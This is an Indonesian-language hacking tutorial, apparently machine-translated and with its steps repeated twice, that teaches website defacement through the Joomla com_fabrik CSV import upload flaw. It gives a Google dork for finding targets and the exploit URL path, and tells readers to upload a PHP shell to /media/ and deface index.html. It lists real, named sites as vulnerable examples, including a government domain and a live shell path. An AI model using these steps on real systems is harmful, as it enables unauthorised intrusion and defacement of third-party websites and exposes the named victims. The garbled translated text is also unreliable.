Com_fabrik Upload Vulnerability
Malam ini, saya akan mengajarkan cara untuk deface website menggunakan Joomla com_fabrik Upload Vulnerability. Metode Serangan pemahaman Com_fabrik komponen Joomla memberikan Anda kekuatan untuk menciptakan bentuk-bentuk dan tabel yang berjalan di dalam Joomla tanpa memerlukan pengetahuan mySQL dan PHP. Kemudian makan data Anda ke dalam Google Maps, Charts atau AJAX berdasarkan calendar.But itu rentan :)
Menemukan Sasaran Rentan Mari kita memulainya
Eksploitasi : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
1.Paste yang salah dork di www.google.com.
Jika Anda ingin mempersempit pencarian untuk domain .com atau domain .com.au kemudian hanya menambahkan "site: com.au" di atas google dork.
Contoh: inurl:
index.php option = com_fabrik situs:? Com.au
(ini akan serach untuk kerentanan com_fabrik untuk website .com.au) Pemanfaatan Sasaran 1. Setelah Anda memiliki daftar situs, pilih situs web apapun dan mengganti menempatkan mengeksploitasi di belakang situs. Contoh:
Dari http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85 Untuk
http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
2. Kemudian, Anda akan mendapatkan sesuatu seperti ini.
3. Sekarang upload file untuk meng-upload seperti picture.jpg atau shell.php
Setelah file Anda berhasil upload , Anda perlu menambahkan /media/yourfilename.jpg untuk melihat file Anda . contoh :
http://www.scb.travel/media/blackcyberseccrew.jpg
4. Contoh dari situs rentan ,
http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1 http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0 5. Anda juga dapat meng-upload shell Anda ke situs :)
http://bluejaylodgecostarica.com/media/up.php dan deface index.html contoh : ini
Menemukan Sasaran Rentan Mari kita memulainya
Dork:
inurl:? Index.php option = com_fabrik
atau index.php option = com_fabrik?
Eksploitasi : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
1.Paste yang salah dork di www.google.com.
Jika Anda ingin mempersempit pencarian untuk domain .com atau domain .com.au kemudian hanya menambahkan "site: com.au" di atas google dork.
Contoh: inurl:
index.php option = com_fabrik situs:? Com.au
(ini akan serach untuk kerentanan com_fabrik untuk website .com.au) Pemanfaatan Sasaran 1. Setelah Anda memiliki daftar situs, pilih situs web apapun dan mengganti menempatkan mengeksploitasi di belakang situs. Contoh:
Dari http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85 Untuk
http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
2. Kemudian, Anda akan mendapatkan sesuatu seperti ini.
3. Sekarang upload file untuk meng-upload seperti picture.jpg atau shell.php
Setelah file Anda berhasil upload , Anda perlu menambahkan /media/yourfilename.jpg untuk melihat file Anda . contoh :
http://www.scb.travel/media/blackcyberseccrew.jpg
4. Contoh dari situs rentan ,
http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1 http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0 5. Anda juga dapat meng-upload shell Anda ke situs :)
http://bluejaylodgecostarica.com/media/up.php dan deface index.html contoh : ini
Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.